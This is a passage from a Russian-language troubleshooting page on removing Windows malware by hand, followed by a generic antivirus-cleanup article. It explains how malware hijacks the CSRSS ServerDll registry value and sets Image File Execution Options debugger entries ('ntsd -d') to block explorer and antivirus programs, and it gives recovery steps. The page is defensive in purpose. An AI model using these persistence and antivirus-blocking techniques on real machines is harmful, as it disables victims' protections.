    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ Control\Session Manager

    Одним из способов внедрения в систему, является подмена dll-файла для CSRSS. Если вы посмотрите содержимое записи

    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ Control\Session Manager\SubSystems

    То найдете значения

    ServerDll=basesrv , ServerDll=winsrv . Библиотеки basesrv.dll и winsrv.dll - это "правильные" файлы системы, загружаемые службой CSRSS на обычной (незараженной) системе. Эту запись в реестре можно подправить на запись, обеспечивающую загрузку, например, вместо basesrv.dll, вредоносной basepvllk32.dll:

    ServerDll=basepvllk32 (или какую либо другую dll, отличную от basesrv и winsrv)

    Что обеспечит, при следующей перезагрузке, получение управления вредоносной программе. Если же ваш антивирус обнаружит и удалит внедренную basepvllk32, оставив нетронутой запись в реестре, то загрузка системы завершится "синим экраном смерти" (BSOD) с ошибкой STOP c000135 и сообщением о невозможности загрузить basepvllk32.

    Поправить ситуацию можно так:

    Загрузится в консоль восстановления (или в любой другой системе), и скопировать файл basesrv.dll из папки C:\WINDOWS\system32 в ту же папку под именем basepvllk32.dll. После чего система загрузится и можно будет вручную подправить запись в реестре.
    - загрузиться с использованием Winternals ERD Commander и исправить запись в реестре на ServerDll=basesrv . Или выполнить откат системы с использованием точки восстановления.

        Еще один характерный пример. Вредоносная программ регистрируется как отладчик процесса explorer.exe, создавая в реестре запись типа:

    "Debugger"="C:\Program Files\Microsoft Common\wuauclt.exe"
    Удаление wuauclt.exe антивирусом без удаления записи в реестре приводит к невозможности запуска explorer.exe. В результате вы получаете пустой рабочий стол, без каких-либо кнопок и ярлыков. Выйти из положения можно используя комбинацию клавиш CTRL-ALT-DEL. Выбираете "Диспетчер задач" - "Новая задача" - "Обзор" - находите и запускаете редактор реестра regedit.exe. Затем удаляете ключ
    HKM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe
    и перезагружаетесь.

        В случае, когда вы точно знаете время заражения системы, откат на точку восстановления до этого события, является довольно надежным способом избавления от заразы. Иногда есть смысл выполнять не полный откат, а частичный, с восстановлением файла реестра SYSTEM, как это описано в статье "Проблемы с загрузкой ОС" раздела "Windows"

        == Май 2008. ==

    Дополнение

        Это дополнение возникло через год после написания основной статьи. Здесь я решил разместить наиболее интересные решения, возникшие в процессе борьбы с вредоносным программным обеспечением. Что-то вроде коротких заметок.

    После удаления вируса ни один антивирус не работает.

        Случай интересен тем, что способ блокировки антивирусного программного обеспечения можно использовать и в борьбе с исполняемыми файлами вирусов. Началось все с того, что после удаления довольно примитивного вируса не заработал лицензионный "Стрим Антивирус". Переустановки с чисткой реестра не помогли. Попытка установки Avira Antivir Personal Free закончилась успешно, но сам антивирус не запустился. В системном журнале было сообщение о таймауте при запуске службы "Avira Antivir Guard". Перезапуск вручную заканчивался той же ошибкой. Причем, никаких лишних процессов в системе не выполнялось. Была стопроцентная уверенность - вирусов, руткитов и прочей гадости (Malware) в системе нет.
        В какой-то момент попробовал запустить антивирусную утилиту AVZ . Принцип работы AVZ во многом основан на поиске в изучаемой системе разнообразных аномалий. С одной стороны, это помогает в поиске Malware, но с другой вполне закономерны подозрения к компонентам антивирусов, антишпионов и прочего легитимного ПО, активно взаимодействующего с системой. Для подавления реагирования AVZ на легитимные объекты и упрощения анализа результатов проверки системы за счет отметки легитимных объектов цветом и их фильтрации из логов, применяется база безопасных файлов AVZ. С недавнего времени запущен полностью автоматический сервис, позволяющий всем желающим прислать файлы для пополнения этой базы.
    Но: исполняемый файл avz.exe не запустился! Переименовываю avz.exe в musor.exe - все прекрасно запускается. В очередной раз AVZ оказался незаменимым помощником в решении проблемы. При выполнении проверок в результатах появилась строки:

    Опасно - отладчик процесса "avz.exe"="ntsd-d"
    Опасно - отладчик процесса "avguard.exe"="ntsd-d"
    :.

    Это была уже серьезная зацепка. Поиск в реестре по контексту "avz" привел к обнаружению в ветке

    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options

    Раздела с именем avz.exe , содержащем строковый параметр с именем "Debugger" и значением .
    И, как выяснилось позже, в указанной ветке присутствовал не только раздел "avz.exe", но и разделы с именами исполняемых модулей практически всех известных антивирусов и некоторых утилит мониторинга системы. Сам ntsd.exe - вполне легальный отладчик Windows, стандартно присутствующий во всех версиях ОС, но подобная запись в реестре приводит к невозможности запуска приложения, имя исполняемого файла которого совпадает с именем раздела???.exe.

        После удаления из реестра всех разделов, c именем???.exe и содержащих запись "Debugger" = "ntsd -d" работоспособность системы полностью восстановилась.

    В результате анализа ситуации с использованием параметра "ntsd -d" для блокировки запуска исполняемых файлов, появилась мысль использовать этот же прием для борьбы с самими вирусами. Конечно, это не панацея, но в какой-то степени может снизить угрозу заражения компьютера вирусами с известными именами исполняемых файлов. Для того, чтобы в системе невозможно было выполнить файлы с именами ntos.exe, file.exe, system32.exe и т.п. можно создать reg-файл для импорта в реестр:

    Windows Registry Editor Version 5.00

    "Debugger"="ntsd -d"
    "Debugger"="ntsd -d"
    "Debugger"="ntsd -d"
    :.. и т.д.

    Обратите внимание, на то, что имя раздела не содержат пути файла, поэтому данный способ нельзя применять для файлов вирусов, имена которых совпадают с именами легальных исполняемых файлов, но сами файлы нестандартно размещены в файловой системе. Например, проводник Explorer.exe находится в папке \WINDOWS\, а вирус располагается где-то в другом месте - в корне диска, в папке \temp, \windows\system32\ Если вы создадите раздел с именем "Explorer.exe" - то после входа в систему вы получите пустой рабочий стол, поскольку проводник не запустится. Хуже того, если вы создадите раздел, имя которого совпадает с именем системной службы (winlogon.exe, csrss.exe, smss.exe, services.exe, lsass.exe), то получите рухнувшую систему. Если вирус находится в C:\temp\winlogon.exe, а легальный модуль входа в систему C:\WINDOWS\SYSTEM32\winlogon.exe, создание раздела с именем winlogon.exe приведет к невозможности запуска службы winlogon и краху системы с синим экраном смерти (BSOD).

        Но, все же, надеяться на то, что запрашиваемый вирусом код, подойдет в каждом конкретном случае, не стоит. Как не стоит надеяться на честное самоуничтожение вируса, и тем более, не стоит отправлять СМС. Любой вирус можно удалить, даже если он не обнаруживается антивирусами. Методики удаления вируса-вымогателя ничем не отличаются от методик удаления любого другого вредоносного ПО, с одним, пожалуй, отличием - не стоит тратить время на попытки справиться с дрянью в среде зараженной системы, разве что для развития собственных навыков и пополнения знаний.

    Наиболее простой и эффективный путь - загрузиться с использованием другой, незараженной системы и, подключившись к зараженной, удалить файлы вируса и исправить внесенные им записи в реестре. Об этом я уже писал выше, в основной части статьи, а здесь попытаюсь просто изложить несколько кратких вариантов удаления вируса.

  • Использование Dr.Web LiveCD - самый простой и не требующий специальных знаний способ. Скачиваете iso-образ CD, записываете его на болванку, загружаетесь с CD-ROM и запускаете сканер.
  • Использование Winternals ERD Commander. Загружаетесь с него, подключившись к зараженной системе, и выполняете откат на контрольную точку восстановления с датой, когда заражения еще не было. Выбираете меню System Tools - System Restore . Если откат средствами ERD Commander"а выполнить невозможно, попробуйте вручную найти файлы реестра в данных контрольных точек и восстановить их в каталог Windows. Как это сделать я подробно описал в статье "Работа с реестром".
  • Загрузка в другой ОС и ручное удаление вируса. Самый сложный, но самый эффективный способ. В качестве другой ОС удобнее всего использовать тот же ERD Commander. Методика обнаружения и удаления вируса может быть следующей:

    Переходите на диск зараженной системы и просматриваете системные каталоги на наличие исполняемых файлов и файлов драйверов с датой создания близкой к дате заражения. Перемещаете эти файлы в отдельную папку. Обратите внимание на каталоги

    \Windows
     \Windows\system32
     \Windows\system32\drivers
     \Windows\Tasks\
     \RECYCLER
    \System Volume Information
     Каталоги пользователей \Documents And Settings\All Users и \Documents And Settings\имя пользователя

    Очень удобно использовать для поиска таких файлов FAR Manager, с включенной сортировкой по дате для панели, где отображается содержимое каталога (комбинация CTRL-F5). Особое внимание стоит обратить на скрытые исполняемые файлы. Существует также эффективная и простая утилита от Nirsoft - SearchMyFiles, применение которой позволяет, в подавляющем большинстве случаев, легко обнаружить вредоносные файлы даже без использования антивируса. Способ обнаружения вредоносных файлов по времени создания (Creation time)

    Подключаетесь к реестру зараженной системы и ищете в нем ссылки на имена этих файлов. Сам реестр не мешает предварительно скопировать (полностью или, по крайней мере, те части, где встречаются выше указанные ссылки). Сами ссылки удаляете или изменяете в них имена файлов на другие, например - file.exe на file.ex_, server.dll на server.dl_, driver.sys на driver.sy_.

    Данный способ не требует особых знаний и в случаях, когда вирус не меняет дату модификации своих файлов (а это пока встречается очень редко) - дает положительный эффект. Даже если вирус не обнаруживается антивирусами.

    Если предыдущие методики не дали результата, остается одно - ручной поиск возможных вариантов запуска вируса. В меню Administrative Tools ERD Commander"а имеются пункты:

    Autoruns - информация о параметрах запуска приложений и оболочке пользователя.
    Service and Driver Manager - информация о службах и драйверах системы.

  • - В качестве продолжения темы - как избавиться от вирусов с помощью стандартных средств операционной системы Windows Vista \ Windows 7. Использование безопасного режима с поддержкой командной строки.
  • Использование загрузочного диска Winternals ERD Commander - Подробная инструкция по применению диска аварийного восстановления системы, созданного на базе Microsoft Diagnostic and Recovery Toolset (MS DaRT) .
  • Сайт Олега Зайцева, автора AVZ. - Посвящен информационной безопасности, и в частности - применению одной из наиболее эффективных антивирусных утилит AVZ.
  • Восстановление системы после вирусного заражения Как восстановить работоспособность Windows после удаления вируса, повредившего некоторые настройки. Помогает в случаях, когда не запускаются программы, при подмене страниц, открываемых обозревателем, подмене домашней страницы, страницы поиска, при изменении настроек рабочего стола, невозможности запуска редактора реестра, отсутствии доступа в Интернет, недоступности некоторых сайтов и т.п.

    • Заражение вирусами компьютера – это совершенно не новая проблема, с которой сталкивался каждый компьютерный пользователь. Во время загрузки операционной системы появляется какое-то информационное окно, а то и не одно. А еще некоторые программы начинают работать некорректно, либо сама собой меняется стартовая страница вашего браузера, в нее устанавливаются разные дополнения. Бывает даже так, что компьютер не включается вообще или загружается слишком долго, и потом во время работы тоже тормозит. Если имеет место хотя бы один из перечисленных выше признаков, то значит, ПК подхватил вирус и его надо «лечить».

    Что делать, если компьютер заражен

    Все действия по очистке зараженного компьютера в разных вариациях соответствуют следующему алгоритму:

    1. скачать специальную антивирусную программу
    2. установить соответствующее ПО на свой компьютер
    3. запустить полное сканирование ПК

    Обновить базы установленного антивируса нужно до последней версии. Кстати, в большинстве случаев, антивирус самостоятельно проверяет обновления во время подключения к интернету и так же автоматически скачивает их. Конечно, антивирусы у всех разные, но пункт «обновление» есть везде. Так что нужно открыть антивирус, иконка которого расположена в строке уведомлений, что в правом нижнем углу, выбрать на пункт «обновление», после сего нажать на нечто вроде "Обновить сейчас".


    Совет

    После того закачки обновления нужно будет полностью проверить свой компьютер. Этот пункт всегда где-то во вкладке под названием "Сканирование ПК", либо "Проверка компьютера".

    Можно выбирать выборочную, быструю или полную проверки. Интересует именно полная проверка, ее и нужно выбрать. Идет она, правда, очень долго, но надо запастись терпением и дождаться её окончания. Даже если все продолжается более 12 часов. После окончания полной проверки, все те файлы, которые возможно «вылечить», лечите. А те, что нельзя, нужно удалите. Вредоносное ПО на подобие троянов и вирусов, антивирусная программа сама удалит.


    После того, как полноценно проверится антивирусом компьютер, желательно скачать утилиту Dr.Web CureIt и проверить ею весь свой компьютер. Кстати, тем, у кого основным антивирусом является Dr.Web, нужна будет другая утилита. Например, от лаборатории Касперского. Она называется AVPTool. Как первой, так и второй утилитой надо проверять, пребывая в безопасном режиме. Для этого следует перезагрузить свой компьютер, и нажимать раз в секунду, а то и чаще на клавишу F8. В появившемся меню понадобится выбрать пункт "Безопасный режим". ОН чаще всего идет первым. Когда Windows загрузится в данном режиме, нужно зайти в то место, куда была сохранена скачанная утилита и запустить ее. По окончании полной проверки, файлы, которые еще можно вылечить, следует лечить, а те, что нельзя вылечить, просто удаляйте. Можно для большей верности проверить несколькими утилитами.


    Совет

    В принципе, почти для всех пользователей ПК на данном этапе проверка компьютера на предмет вирусов может быть закончена. Тем, чьи сайты взломаны, также надо проверить, остались ли доступы у вирусов к сайтам. Очень часто троянские вирусы «воруют» логины с паролями.

    Что делать, если в результате действия вирусов операционная система стала некорректно работать?

    Первое, требуется сделать в таком случае, так это запустить «Восстановление системы» и попробовать сделать откат, при помощи, ранее созданной «точки восстановления», назад. Если у вас появляется сообщение типа "Восстановление системы отключено групповой политикой", то нужно открыть Групповые политики через «Пуск-Выполнить-gpedit.msc. ОК». Когда откроется Групповая политика, понадобится выбрать «Конфигурация компьютера-Административные шаблоны-Система-Восстановление системы» И если щёлкнуть дважды левой клавишей на пункте «Отключить восстановление системы», то должно появиться соответствующее окно. И, для нормальной работы, и для восстановления системы в нём надо отметить пункт "Не задан" или "Отключен". тогда все вступит в силу сразу после перезагрузки. Правда, в версиях Windows Home отсутствует Групповая политика.

    Борьба с вирусами в безопасном режиме

    В Безопасном режиме возможно опять попытаться убрать вредоносный файл из ПК и из автозагрузки. И в большинстве случаев это успешно получается. Если же в безопасный режим войти не удалось, то можно воспользоваться простым, но проверенным способом. То есть, почистить ПК с диска восстановления ESET NOD32, либо Dr.Web. Кстати их можно использовать в рли Live CD. Владельцам Live CD нужно попытаться загрузиться с него, чтобы проделать то же самое, что только что вы пытались в безопасном режиме. Можно также запустить с флеш накопителя антивирусный сканер, например, тот же Dr.Web CureIt.


    Иногда помогает только переустановка Windows. Когда вирус удален, то если стоит Windows XP, возможно, что перестанет работать подключение к интернету. Такое происходит из-за нарушения, которое вносит вирус в настройки сетевой карты. Придется настраивать заново.


    Вывод:

    К сожалению, просторы мировой паутины буквально кишат недоброжелателями, а потому адекватная работа в интернете возможна только при наличии антивирусной системы. Иногда вирусами можно заразить ПК и через съемный накопитель. В любом случае, для нормальной работы ПК нужно будет уничтожить вредоносную программу, но сделать это не всегда бывает легко.


    Как избавиться от вирусов на компьютере

    Удаление вирусов

    Чистим компьютер
    Способы подключения наушников с микрофоном или телефонной гарнитуры к компьютеру « Предыдущая запись

    Способы подключения наушников с микрофоном или телефонной гарнитуры к компьютеру

    Консольные команды и читы для Minecraft Следующая запись »

    Консольные команды и читы для Minecraft

    Рубрики
    Последние записи
    Страницы

    © 2024 Компьютерные уроки для начинающих — bioproshop.ru ·